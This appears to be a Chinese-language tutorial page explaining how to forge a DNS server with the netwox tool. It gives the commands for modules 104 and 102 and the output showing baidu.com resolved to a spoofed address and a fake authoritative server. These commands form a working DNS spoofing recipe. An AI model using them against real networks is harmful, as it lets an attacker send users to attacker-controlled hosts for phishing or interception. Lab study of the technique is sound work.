如何伪造DNS服务器?
发布时间:2020-12-25 07:58:33 所属栏目:电商 来源:网络整理
导读:DNS 服务器是进行域名和与之相对应的 IP 地址转换的服务器。正常情况下,用户访问域名网站,首先从 DNS 服务器上或权威名称服务器上获取域名对应的 IP 地址,然后根据该 IP 地址访问网站。 为了能够使用户混淆,netwox 工具提供了编号为 104 的模块。它可以伪
|
DNS 服务器是进行域名和与之相对应的 IP 地址转换的服务器。正常情况下,用户访问域名网站,首先从 DNS 服务器上或权威名称服务器上获取域名对应的 IP 地址,然后根据该 IP 地址访问网站。 root@daxueba:~# netwox 104 -h baidu.com -H 110.111.112.113 -a 123.baidu.com -A 56.67.78.89 执行命令后将成功伪造域名 baidu.com 的 DNS 服务器,当有用户向该服务器请求域名 baidu.com 对应的 IP 地址时,将会给出伪造的地址。2) 这时,使用 netwox 工具中编号为 102 的模块,请求域名 baidu.com 对应的IP地址,执行命令如下: root@daxueba:~# netwox 102 -i 192.168.59.133 -n baidu.com -y a 执行命令后,将从伪造的 DNS 服务器(地址为 192.168.59.133)上获取对应的 IP 地址、权威服务器以及对应的 IP 地址信息。获取到的信息如下: DNS_question_________________________________________________. #DNS请求 | id=29841 rcode=OK opcode=QUERY | | aa=0 tr=0 rd=0 ra=0 quest=1 answer=0 auth=0 add=0 | | baidu.com. A | |__________________________________________________________ | DNS_answer________________________________________________. #DNS响应 | id=29841 rcode=OK opcode=QUERY | | aa=1 tr=0 rd=0 ra=0 quest=1 answer=1 auth=1 add=1 | | baidu.com. A | | baidu.com. A 10 110.111.112.113 | #域名对应的IP地址 | 123.baidu.com. NS 10 123.baidu.com. | #权威服务器名称 | 123.baidu.com. A 10 56.67.78.89 | #权威服务器IP地址 |_____________________________________________________________ |从输出信息可以看到,获取到的域名 baidu.com 对应的 IP 地址为伪造的地址 110.111.112.113,该域名的权威服务器也是伪造的服务器 123.baidu.com,对应的 IP 地址为 56.67.78.89。 (编辑:核心网) 【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容! |
站长推荐
热点阅读